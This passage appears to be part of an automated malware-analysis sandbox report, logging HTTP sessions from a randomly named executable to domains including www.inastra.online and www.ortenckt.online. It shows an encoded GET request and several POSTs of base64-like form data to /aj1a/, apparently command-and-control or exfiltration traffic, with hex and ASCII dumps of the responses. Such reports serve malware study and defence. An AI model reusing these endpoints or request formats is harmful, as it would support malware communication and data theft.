                                                                                                                                                        Data Ascii: cVfw/UJj1Dk97xmr3G0hHGOGy7wKjLnXSOKVCwlp/SpzENnvuzN6+etKEhVE0qmlBjovERKPvCRTPc2EKsxHJRanrWjY9F3vSW9IsRg8GOrHuvYtLltkC27LBXVqgaHm6UZwJpnSiSrGuci4K29SOnnNDVAglyKrrrJ5ZKsjDT0Pc3y8esG6RVr0eweLvVkLen0EjBK9WbiiEfqHvC5nzqlUhNrZ0sPJjcqhP1UgqGbrRK5WD4F
                                                                                                                                                        Dec 5, 2024 05:38:28.068192005 CET1236INData Raw: 59 48 4e 6a 2b 6a 35 6a 73 61 6e 4a 31 68 53 46 31 35 52 51 79 77 77 75 57 5a 48 53 62 4f 42 35 4c 4c 42 6d 32 47 34 4d 67 77 4b 61 75 54 55 78 46 52 48 61 66 2b 37 2f 37 57 4f 53 62 6a 32 47 31 78 45 59 52 39 66 66 74 54 5a 4a 2f 76 75 56 33 5a
                                                                                                                                                        Data Ascii: YHNj+j5jsanJ1hSF15RQywwuWZHSbOB5LLBm2G4MgwKauTUxFRHaf+7/7WOSbj2G1xEYR9fftTZJ/vuV3ZsZ+mBouYSHGBgvN7R5LJh9alJHQBgMlxzP/eYyA3d+fxD7gE+XwwT7Y1DysQ2X3FCAi2XNISIvT3L3T2CXvqC4JxpYNKDs1FwsGrt8Gs3UHbmIPYWDnGOPcG+OFEYdUJ/blNcOq/jXpeij7a7Occ3cC4qpGLVvQYA
                                                                                                                                                        Dec 5, 2024 05:38:28.068248034 CET1236INData Raw: 39 47 41 65 49 77 30 6c 50 4d 33 61 52 65 6f 51 61 71 63 42 67 6e 70 6c 55 44 4c 37 47 6f 50 72 4d 72 42 52 62 58 71 56 45 6a 55 53 2f 50 68 47 4b 38 4c 72 51 36 44 63 50 32 42 7a 45 4b 66 50 42 54 4b 70 6d 6c 49 38 57 71 6a 6b 63 4d 69 34 62 53
                                                                                                                                                        Data Ascii: 9GAeIw0lPM3aReoQaqcBgnplUDL7GoPrMrBRbXqVEjUS/PhGK8LrQ6DcP2BzEKfPBTKpmlI8WqjkcMi4bStBFUgZ+H3vxg6oabxfieQjXzcLnjVerHQCKSZH1j3mQEepxxqITn2LhNGTV/iK7Nj4DtnKx3hnHdeW98ceyS3T7x8eZkLrz20m0omsnCdYuZm1aT/aUzv9595HoPuEmJNq0w9zj6IuTDCrOFNYtzAUzvjFjIf8coo
                                                                                                                                                        Dec 5, 2024 05:38:28.068259001 CET1236INData Raw: 4d 58 46 37 69 57 65 4f 69 75 5a 6a 37 44 69 6a 4e 61 32 4c 78 64 33 69 6e 50 45 46 34 2f 68 39 6a 63 6c 33 44 7a 78 44 61 78 59 6a 4f 74 38 47 4e 6b 34 57 79 39 52 6e 48 48 6e 4d 50 56 63 7a 74 4c 6d 4e 6e 78 59 46 7a 4b 79 6b 77 69 68 50 6f 73
                                                                                                                                                        Data Ascii: MXF7iWeOiuZj7DijNa2Lxd3inPEF4/h9jcl3DzxDaxYjOt8GNk4Wy9RnHHnMPVcztLmNnxYFzKykwihPos9H7UGBxUz+IbPNHuvmVTakt7c2LrgYDe4u+fC65BXEGSbhKCGRbW5VmffmuR47z/EGbXDA6axf44sQsMJvyaKrMhHMlSe3gf1uQdq7VKETVKvPo6LavZk6viQxi4FfCZmpGNqgobt7V47gWeudZxHCF1JY354bO9n
                                                                                                                                                        Dec 5, 2024 05:38:28.068439960 CET1236INData Raw: 61 49 41 61 72 79 6a 30 6b 64 6b 5a 79 45 31 2f 58 65 39 77 4c 6e 75 6f 63 30 6b 6e 68 43 30 58 62 30 79 2b 38 41 30 61 71 79 58 68 78 31 65 46 6e 41 77 54 54 64 47 57 52 79 52 72 75 43 2b 41 56 35 4e 62 63 51 79 75 59 6b 43 6d 2b 41 2b 77 74 73
                                                                                                                                                        Data Ascii: aIAaryj0kdkZyE1/Xe9wLnuoc0knhC0Xb0y+8A0aqyXhx1eFnAwTTdGWRyRruC+AV5NbcQyuYkCm+A+wtsueQcKIXauUpe/EeUX05p8nOJwc8RxIazF5tBnY9gWqR2tMn849RMYYmUvOWjrZ97jlL58QH4gW8Y1xHRP/yVrrMphMGZQbtpQNWoa2KZgUHECVhPb4i/qb4awu5jUZ+xqE5EMBjJhcfOXjTVGWMp1kqz6dKGEn6EI
                                                                                                                                                        Dec 5, 2024 05:38:28.068449974 CET1236INData Raw: 44 72 54 58 69 4d 2b 6f 58 32 67 56 67 75 71 4d 79 33 4d 54 4f 67 35 7a 7a 49 31 69 61 77 39 4b 44 67 6b 34 2b 4e 31 72 45 6f 4e 70 63 66 37 57 78 44 68 65 47 32 51 7a 6b 54 6d 49 68 62 2f 45 59 78 41 46 32 6d 55 6c 4a 53 65 67 76 32 6d 7a 54 4e
                                                                                                                                                        Data Ascii: DrTXiM+oX2gVguqMy3MTOg5zzI1iaw9KDgk4+N1rEoNpcf7WxDheG2QzkTmIhb/EYxAF2mUlJSegv2mzTNaZxdmA2/59M6luhH9PnNnDl+5Ck8IA7TPHQ/pzKNkA71NZ4aA0TAyXODOAhxfepfa4KRzkuUwDdg0n4zii8wi9B1j3jzDBrJlzQixPL+iZN58QvhkEIDchsS1sP3WK0b5E5wIRoW/C3zR0mX7GLUiWzsoxYtBKeEI
                                                                                                                                                        Dec 5, 2024 05:38:28.068466902 CET1236INData Raw: 4f 58 66 65 62 4b 6a 76 38 52 58 74 57 4a 31 30 4c 66 41 2b 52 4c 66 51 6e 74 68 68 68 64 42 45 48 34 41 6f 33 66 51 6e 71 36 2b 61 61 41 68 33 67 4f 6b 30 67 4e 36 6d 6b 45 72 6a 67 65 41 51 64 34 73 52 57 44 6a 75 59 62 35 55 77 5a 32 45 73 67
                                                                                                                                                        Data Ascii: OXfebKjv8RXtWJ10LfA+RLfQnthhhdBEH4Ao3fQnq6+aaAh3gOk0gN6mkErjgeAQd4sRWDjuYb5UwZ2EsgqvE8qskCrBhsLKGVxtQXdodsmKgGs0NF6NPNdqfZc5RdmPnhs9vIUojk1vUXdfhLZEHPcw2u5vZPOmzyD/NP828B5TxalC23ZWTcSTH5f5kXLxupFxnjsA+BDEd+SsT89PlS2o5vkcbXl9WmZh2IGofESBQQTPtan
                                                                                                                                                        Dec 5, 2024 05:38:28.189172029 CET1236INData Raw: 61 47 56 63 2f 4e 47 67 4b 49 4e 62 69 74 56 61 75 39 48 70 72 47 2f 61 38 64 74 77 67 54 48 73 6a 6d 41 6c 65 42 4a 62 6b 2f 31 77 58 4c 36 73 64 43 58 54 4a 4a 2f 6d 61 44 67 71 2b 2b 59 32 30 55 51 43 55 50 74 54 43 44 62 32 64 49 38 32 51 78
                                                                                                                                                        Data Ascii: aGVc/NGgKINbitVau9HprG/a8dtwgTHsjmAleBJbk/1wXL6sdCXTJJ/maDgq++Y20UQCUPtTCDb2dI82QxXhWUOfJOEWm0f3N6ISicuwjCe357QFHhai5uEIb+Hu9QLgN0dFMAQeIeMjfPZYtVMwhTLtb6FyvdEC8gVK3LnWnxd22V0FN7XNjfM+24aJOOq5fuChWWmaNujM9fgWB2PuENdIBKzsXECR6ocbq8gtmYmpd4Lk1LF


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.649821208.91.197.27803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:38:51.643821001 CET550OUTGET /gbk4/?Jr=tnaxxtx&ZrE=Xcz/lKtmYzaclw33ohiXS7QV/Se8Pq+n4C+TPx5KwIQWTY7xXXdhlW/5Nf4u3/jcsrURWrDv59TKoDO7PIpn/ZUTTTwXyUNiXs6DylNi2YpMPJOOA+G6DJ3d/zRep1m17eaWMwM= HTTP/1.1
                                                                                                                                                        Host: www.inastra.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Connection: close
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Dec 5, 2024 05:38:53.469074011 CET1236INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 05 Dec 2024 04:38:52 GMT
                                                                                                                                                        Server: Apache
                                                                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                        Set-Cookie: vsid=901vr480919132753898609; expires=Tue, 04-Dec-2029 04:38:52 GMT; Max-Age=157680000; path=/; domain=www.inastra.online; HttpOnly
                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_YvUpfd3Zeiz2XqATRm0coKetJScRAH2HXKDrH1v1kJJuadda9Xp8koTp4d6ZlSRQR8sS3D/dL2mu8ncogAbDdQ==
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 62 39 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d
                                                                                                                                                        Data Ascii: b95d<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                                                        Dec 5, 2024 05:38:53.469137907 CET110INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72
                                                                                                                                                        Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprApplies
                                                                                                                                                        Dec 5, 2024 05:38:53.469150066 CET1236INData Raw: 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e
                                                                                                                                                        Data Ascii: Globally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in w
                                                                                                                                                        Dec 5, 2024 05:38:53.469162941 CET1236INData Raw: 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63
                                                                                                                                                        Data Ascii: eturn cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).t
                                                                                                                                                        Dec 5, 2024 05:38:53.469204903 CET1236INData Raw: 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61
                                                                                                                                                        Data Ascii: erCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}e
                                                                                                                                                        Dec 5, 2024 05:38:53.469217062 CET438INData Raw: 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75
                                                                                                                                                        Data Ascii: text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(
                                                                                                                                                        Dec 5, 2024 05:38:53.469228029 CET1236INData Raw: 75 67 75 6e 6d 69 6e 69 6d 69 7a 65 64 3a 30 29 3e 30 3f 22 22 3a 22 2e 6d 69 6e 22 3b 76 61 72 20 61 3d 78 28 22 63 6d 70 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 2c 22 63 6d 70 5f 64 65 62 75 67 63 6f 76 65 72 61 67 65 22 20 69 6e 20 68 3f 68
                                                                                                                                                        Data Ascii: ugunminimized:0)>0?"":".min";var a=x("cmpdebugcoverage","cmp_debugcoverage" in h?h.cmp_debugcoverage:"");if(a=="1"){m="instrumented";p=""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javas
                                                                                                                                                        Dec 5, 2024 05:38:53.469374895 CET1236INData Raw: 7b 62 3d 62 2e 73 75 62 73 74 72 28 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 76 61 72 20 67 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 29 3b 69 66 28 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 21 3d 2d 31 29
                                                                                                                                                        Data Ascii: {b=b.substr(1,b.length)}var g=b.substring(0,b.indexOf("="));if(b.indexOf(";")!=-1){var c=b.substring(b.indexOf("=")+1,b.indexOf(";"))}else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.su
                                                                                                                                                        Dec 5, 2024 05:38:53.469384909 CET1236INData Raw: 74 75 72 6e 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 67 70 70 2e 65 3d 5f 5f 67 70 70 2e 65 7c 7c 5b 5d 3b 69 66 28
                                                                                                                                                        Data Ascii: turn window.cmp_gpp_ping()}else{if(g==="addEventListener"){__gpp.e=__gpp.e||[];if(!("lastId" in __gpp)){__gpp.lastId=0}__gpp.lastId++;var c=__gpp.lastId;__gpp.e.push({id:c,callback:f});return{eventName:"listenerRegistered",listenerId:c,data:tr
                                                                                                                                                        Dec 5, 2024 05:38:53.469397068 CET1236INData Raw: 64 2c 62 2e 76 65 72 73 69 6f 6e 2c 66 75 6e 63 74 69 6f 6e 28 68 2c 67 29 7b 76 61 72 20 65 3d 7b 5f 5f 75 73 70 61 70 69 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e
                                                                                                                                                        Data Ascii: d,b.version,function(h,g){var e={__uspapiReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")})}if(typeof(c)==="object"&&c!==null&&"__tcfapiCall" in c){var b=c.__tcfapiCall;window.__tcfapi(b.command
                                                                                                                                                        Dec 5, 2024 05:38:53.589072943 CET1236INData Raw: 4c 69 73 74 65 6e 65 72 28 22 6d 65 73 73 61 67 65 22 2c 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 2c 66 61 6c 73 65 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 61 64 64 46 72 61 6d 65 28 22 5f 5f 63 6d 70 4c 6f 63 61 74 6f
                                                                                                                                                        Data Ascii: Listener("message",window.cmp_msghandler,false)}};window.cmp_addFrame("__cmpLocator");if(!("cmp_disableusp" in window)||!window.cmp_disableusp){window.cmp_addFrame("__uspapiLocator")}if(!("cmp_disabletcf" in window)||!window.cmp_disabletcf){wi


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.6498633.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:09.641791105 CET818OUTPOST /aj1a/ HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ortenckt.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 208
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ortenckt.online/aj1a/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 5a 70 63 35 56 46 39 37 30 4a 47 76 53 37 6a 4f 75 44 6e 66 50 31 6c 62 65 58 46 4e 33 52 77 31 4a 71 6f 41 54 31 76 78 76 68 42 46 31 74 45 7a 6f 4a 36 43 38 57 6e 58 55 67 2f 32 49 34 54 78 2f 68 46 39 34 63 4c 70 78 47 75 6c 68 53 4a 36 63 43 2b 61 55 65 4e 71 32 79 4b 6d 79 47 54 4e 4d 36 6f 39 56 2b 57 2b 74 52 4b 6a 31 55 4f 57 6e 65 6d 44 53 71 36 4e 70 4c 33 33 64 41 49 39 62 4e 67 73 49 33 4f 58 36 77 48 70 71 31 4d 79 34 6c 51 72 67 69 6e 63 2b 58 4b 32 61 65 72 6c 64 75 72 2b 4e 33 77 34 39 6e 55 68 32 4f 39 41 44 4c 55 63 51 4a 64 2b 6e 49 31 51 5a 48 43 31 41 68 35 55 59 53 35 31 32 68 54 42
                                                                                                                                                        Data Ascii: ZrE=Zpc5VF970JGvS7jOuDnfP1lbeXFN3Rw1JqoAT1vxvhBF1tEzoJ6C8WnXUg/2I4Tx/hF94cLpxGulhSJ6cC+aUeNq2yKmyGTNM6o9V+W+tRKj1UOWnemDSq6NpL33dAI9bNgsI3OX6wHpq1My4lQrginc+XK2aerldur+N3w49nUh2O9ADLUcQJd+nI1QZHC1Ah5UYS512hTB


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.6498703.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:12.298032999 CET842OUTPOST /aj1a/ HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ortenckt.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 232
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ortenckt.online/aj1a/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 5a 70 63 35 56 46 39 37 30 4a 47 76 53 61 7a 4f 39 53 6e 66 61 6c 6c 59 43 48 46 4e 75 42 77 78 4a 71 73 41 54 30 72 68 76 33 35 46 32 4a 41 7a 70 49 36 43 70 57 6e 58 62 41 2b 39 48 59 54 36 2f 67 35 50 34 5a 6a 70 78 48 4b 6c 68 51 52 36 63 31 71 56 56 4f 4e 6f 6a 43 4c 67 76 57 54 4e 4d 36 6f 39 56 2f 6d 59 74 52 53 6a 30 6b 2b 57 6d 37 61 41 62 4b 36 4b 75 4c 33 33 5a 41 4a 56 62 4e 68 37 49 31 71 74 36 7a 7a 70 71 78 45 79 35 77 6b 71 35 53 6e 57 67 58 4c 2f 4a 66 47 38 64 4e 43 74 53 67 63 69 6c 32 4d 33 7a 34 38 61 66 34 55 2f 43 5a 39 38 6e 4b 74 69 5a 6e 43 66 43 68 42 55 4b 46 31 53 35 56 32 69 50 34 36 30 53 53 68 4d 2b 5a 65 63 2b 36 48 4e 6e 62 30 61 49 41 3d 3d
                                                                                                                                                        Data Ascii: ZrE=Zpc5VF970JGvSazO9SnfallYCHFNuBwxJqsAT0rhv35F2JAzpI6CpWnXbA+9HYT6/g5P4ZjpxHKlhQR6c1qVVONojCLgvWTNM6o9V/mYtRSj0k+Wm7aAbK6KuL33ZAJVbNh7I1qt6zzpqxEy5wkq5SnWgXL/JfG8dNCtSgcil2M3z48af4U/CZ98nKtiZnCfChBUKF1S5V2iP460SShM+Zec+6HNnb0aIA==


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.6498763.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Dec 5, 2024 05:39:14.951198101 CET1855OUTPOST /aj1a/ HTTP/1.1
                                                                                                                                                        Host: www.ortenckt.online
                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                        Accept-Language: en-US,en
                                                                                                                                                        Origin: http://www.ortenckt.online
                                                                                                                                                        Connection: close
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Content-Length: 1244
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Referer: http://www.ortenckt.online/aj1a/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900W8 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                        Data Raw: 5a 72 45 3d 5a 70 63 35 56 46 39 37 30 4a 47 76 53 61 7a 4f 39 53 6e 66 61 6c 6c 59 43 48 46 4e 75 42 77 78 4a 71 73 41 54 30 72 68 76 33 78 46 32 36 49 7a 6f 76 47 43 76 6d 6e 58 53 67 2b 2b 48 59 54 64 2f 68 51 47 34 5a 6d 63 78 45 69 6c 67 7a 5a 36 55 67 47 56 66 4f 4e 6f 38 53 4c 77 79 47 54 59 4d 36 59 35 56 2f 57 59 74 52 53 6a 30 69 79 57 6d 75 6d 41 5a 4b 36 4e 70 4c 33 7a 64 41 4a 75 62 4a 46 72 49 31 76 53 36 46 44 70 72 52 55 79 2b 43 38 71 6d 69 6e 59 30 33 4c 6e 4a 66 4b 5a 64 4d 75 68 53 6c 67 59 6c 30 51 33 79 65 74 2f 46 4a 55 32 52 4b 39 65 6e 6f 31 64 64 41 71 54 62 58 5a 78 47 58 34 6c 79 30 58 4a 4d 50 69 56 52 67 63 36 2f 6f 57 49 79 4d 57 6e 6e 62 46 68 66 2f 33 72 55 65 34 6f 69 46 52 43 2f 54 43 2f 4e 6e 45 47 31 75 77 6b 74 6f 42 51 5a 48 61 2f 51 4b 33 79 4e 6c 79 72 4d 64 48 32 43 50 50 79 70 6e 4a 31 39 79 64 73 43 76 43 51 72 44 44 50 42 75 63 45 6f 57 49 5a 49 53 68 35 68 58 79 56 4f 65 6d 63 6b 42 32 63 62 74 6f 54 54 6b 4e 6b 65 79 50 58 78 77 4c 45 6b 6a 6c 53 5a 6b [TRUNCATED]
                                                                                                                                                        Data Ascii: ZrE=Zpc5VF970JGvSazO9SnfallYCHFNuBwxJqsAT0rhv3xF26IzovGCvmnXSg++HYTd/hQG4ZmcxEilgzZ6UgGVfONo8SLwyGTYM6Y5V/WYtRSj0iyWmumAZK6NpL3zdAJubJFrI1vS6FDprRUy+C8qminY03LnJfKZdMuhSlgYl0Q3yet/FJU2RK9eno1ddAqTbXZxGX4ly0XJMPiVRgc6/oWIyMWnnbFhf/3rUe4oiFRC/TC/NnEG1uwktoBQZHa/QK3yNlyrMdH2CPPypnJ19ydsCvCQrDDPBucEoWIZISh5hXyVOemckB2cbtoTTkNkeyPXxwLEkjlSZkeOERmfNl2PddDQ1RFCii+YFuEV70i4Ov3/ajEhEcRllWBuUPiBYXqh6ELD3RFAaP0BnHlq2yFpGfOeQle65SMJ4fyi9i3qKqj/QdoNQvo/zaBVJq8TD26AA82xXuhdLGxpdkDpHycQDObKY350b0G//aW/00MRkF+ulXiUEcczN7IDTIDHnPS8Q2UY2/DdF/N7VAVEa5uRPs9bh4jadyk9mnwDKsbep6EtXuHEYBTukDcNNn5AC1qd1yusKYTjuieYKztXvCiIvnm12nN8eU1ouebQ9Z5uTgaEP1w3epTysV2Lq7XnBxxY/GyjW4gZOyhdfL623GlDfpMrhRjZtffvtJRBm+tPBJX/J5442cLkffoaPDjaaq7EZEGoGPATj0iyc6/JGPv30UnxwP0xXuWXS5+H+Dj5wRep5Cxpq7DtgVShwUxfofx9i8oefH8NHDd8s4ehyXMwh9JTQM22z04sP0vEGtecppRuY3pyZIKjLeI6dQRFqoNRzBijgZmlg00eQLnBU4oj+H6Z5K/fHU52qubNz/0Ahd4fz7RsheKqY0ekxRZ202I1vLQx+U++dcA+8E/OWtO3DFB/wunJs4k4jMjIAQixaTDUaNUxts00tJfmCvHptVHexOSph8cnJ6Il5+yB8OByZSsqybifR8b3WbUuXt77nILz [TRUNCATED]


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        6192.168.2.6498863.33.130.190803992C:\Program Files (x86)\odHBSJDnYjlhMohjsdrGeWZUjmoaqIocCpQtkevhqvZNBDjCKrRtgWncaZfuhnmQDwFlDFGcaSgOWel\lSomfUdjbC.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
